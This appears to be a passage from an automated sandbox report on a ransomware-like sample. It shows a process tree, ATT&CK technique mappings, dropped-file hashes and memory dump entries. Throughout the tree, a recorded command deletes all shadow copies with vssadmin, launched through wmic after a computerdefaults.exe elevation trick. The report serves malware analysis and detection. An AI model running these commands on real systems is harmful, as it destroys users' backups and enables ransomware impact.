- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2496
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4936

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3132

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3016

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2444

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5888

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:640
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3728
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2984

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4936
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4592
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5128

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3016
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1356
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5576

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:676
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2304
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3976

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3388

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3260
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5708

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2532
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2168

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5160

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:32

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4796
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5128
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4032
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3976

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4452
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1176
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3500

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2004

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5624

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1284

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6000
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5512
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1368

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3104
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1292
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3956

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5652
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5788

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4396

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2204

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:392
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1664
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4068

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2792
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5396
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:792

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5916

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
719923124ee00fb57378e0ebcbe894f7

SHA1
cc356a7d27b8b27dc33f21bd4990f286ee13a9f9

SHA256
aa22ab845fa08c786bd3366ec39f733d5be80e9ac933ed115ff048ff30090808

SHA512
a207b6646500d0d504cf70ee10f57948e58dab7f214ad2e7c4af0e7ca23ce1d37c8c745873137e6c55bdcf0f527031a66d9cc54805a0eac3678be6dd497a5bbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7114a6cd851f9bf56cf771c37d664a2

SHA1
769c5d04fd83e583f15ab1ef659de8f883ecab8a

SHA256
d2c75c7d68c474d4b8847b4ba6cfd09fe90717f46dd398c86483d825a66e977e

SHA512
33bdae2305ae98e7c0de576de5a6600bd70a425e7b891d745cba9de992036df1b3d1df9572edb0f89f320e50962d06532dae9491985b6b57fd37d5f46f7a2ff8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
431f8ccb057892c69a683178e1a70119

SHA1
ef1463f1311d178671a72434c80f1603fde057b1

SHA256
1c43023ba1ffc5e7abb8adf003bbad2a6f182320812db1c0ba838199ee8baf20

SHA512
b3d3d092e93881241b4704f59076b513397e85385b3842d2d7f30f0f0e018fb6eda711504cc940e96a87f3ef6e853184f71cea97e743e772050878396620b92d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d765fe4d786c5cbca33ca7b32243e9f0

SHA1
ea232d137f9e19258c7fb1a66b0f1291f6b2b2ad

SHA256
6786d746040cf4f80422a413f820294f71a32e0918c06636962c63fff2950caa

SHA512
1d3d371b5a1feeab70ca2cded864fa214c3a53629e35752b03aa7c0425261df4720473a89a617d6dd747d02f83cc967b8658e45fec680905cc5613290c84751d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ad6d63d79a4123f03e60b11d4c15ba27

SHA1
b356a760d5d37d66ff7b654ff931a300b902c274

SHA256
9ca1eff7bb41ffd1a21df607d236e0e387d892f623df929c772ffda581efc424

SHA512
4a16f8fa31e5859e8fc80f56ad304fb8b35066bb2b8960794a72b74548506de9a74ca8ebf8c17173932e1656007d570296067baec5cd360b79bd0824d875ba64

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133686166767466591.txt

Filesize
75KB

MD5
c0c4b333ebeed4b0aeb9fa8a28644bf1

SHA1
7a170ee0c46692e1a47f07214a0e23ae815a96ac

SHA256
92abb13682941d9f89c951fe153bc67f47f501ac6edd593a87afc477469c2026

SHA512
06d262ccb756924e81285cde95c047d28329afa8a1e510b749266b645eb324ff682585d5cd4f143d6080c7315d87475e859d78edb5c37eb605ee211132c2086c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

Filesize
8KB

MD5
df1b08f0a229299b981bdea3cab0907b

SHA1
ada61cf2cb5faa3898d9a6616127cfcb2b1465b2

SHA256
33987cc7b5af07737f78a6338ce46dd2fe05497923b007bedcbaa4d584ae7bf5

SHA512
a0572c706af18ebbc95c69d7a4d41ea0059d782f590fa1f99e737fe285217ab50d0bab38370ba0a8e0bd4fa609c4da5078e0f7a64549c6a73383487b111b94ab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

Filesize
3KB

MD5
2f4f0d815b2162bd127243d3cd769604

SHA1
8487b8c4aa33067a1c22b84aa0a894eaace667c8

SHA256
fb73fb52631da5fe15610f8b2a41e692b5f4281551c2d77f857d896d8f8cc34f

SHA512
32c1c45a60b2675d122cc53804ee842e9760ba85cfbf9d077df02f5355de4260344bc74cb44396b8e14da1e3cddcb220242ddc1c8afdedabbc67ed14563a0289

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
8KB

MD5
488b10d596a0fc90f1c0d90e08e05139

SHA1
1459953de03703c8ca00e8a9f6e6d91d68346410

SHA256
3b47ce694ab90e41d63aa8b52174cbccc7527bac919c3b6d1b978e6454e3a68e

SHA512
e9c992db7de6ffdb9b38fd5746e5442a6a971cb54103b2a86f41c2c18fc25e749809d166c59e53fa5b88db40a04a30432cb6ebb9a9d3d238267fc3cb60b8eaae

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
bee721296cca66ae37b0b58577dd28b2

SHA1
1a6a9c8e119f3acad6f0be0fd2787941e90c6076

SHA256
1302074705b61d1d0f5433523823ace115a6b0e3d33d61010671fb4756fb8e50

SHA512
afd1df3b0c23a361b21920e50ccae86a75a1179c7101120463ae42a9a1925abe6dd70eb004c1b3a73e72ce68a58f1c0402137cf458ff54b4e75d46ff1b40e65c

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/2700-12-0x000001C3B6A20000-0x000001C3B6A25000-memory.dmp

Filesize
20KB

Download
memory/3864-338-0x00000258F4590000-0x00000258F4591000-memory.dmp

Filesize
4KB

Download
memory/3864-337-0x00000258F4A00000-0x00000258F4A08000-memory.dmp

Filesize
32KB

Download
memory/3864-427-0x00000258F4890000-0x00000258F4898000-memory.dmp

Filesize
32KB

Download
memory/3864-428-0x00000258F45F0000-0x00000258F45F1000-memory.dmp

Filesize
4KB

Download
memory/3864-439-0x00000258F4A10000-0x00000258F4A18000-memory.dmp

Filesize
32KB

Download
memory/4396-2-0x00000260BEAD0000-0x00000260BEAD1000-memory.dmp

Filesize
4KB

Download
memory/4396-4-0x00000260BEAF0000-0x00000260BEAF1000-memory.dmp

Filesize
4KB

Download
memory/4396-0-0x00000260BEAB0000-0x00000260BEAB5000-memory.dmp

Filesize
20KB

Download
memory/4396-11-0x00000260BEB80000-0x00000260BEB81000-memory.dmp

Filesize
4KB

Download
memory/4396-10-0x00000260BEBA0000-0x00000260BEBA1000-memory.dmp

Filesize
4KB

Download
memory/4396-9-0x00000260BEB70000-0x00000260BEB71000-memory.dmp

Filesize
4KB

Download
memory/4396-3-0x00000260BEAE0000-0x00000260BEAE1000-memory.dmp

Filesize
4KB

Download
memory/4396-1-0x00000260BEAC0000-0x00000260BEAC1000-memory.dmp

Filesize
4KB

Download
memory/4396-5-0x00000260BEB00000-0x00000260BEB01000-memory.dmp

Filesize
4KB

Download
memory/4396-6-0x00000260BEB10000-0x00000260BEB11000-memory.dmp

Filesize
4KB

Download
memory/4396-7-0x00000260BEB20000-0x00000260BEB21000-memory.dmp

Filesize
4KB

Download
memory/4396-8-0x00000260BEB60000-0x00000260BEB61000-memory.dmp

Filesize
4KB

Download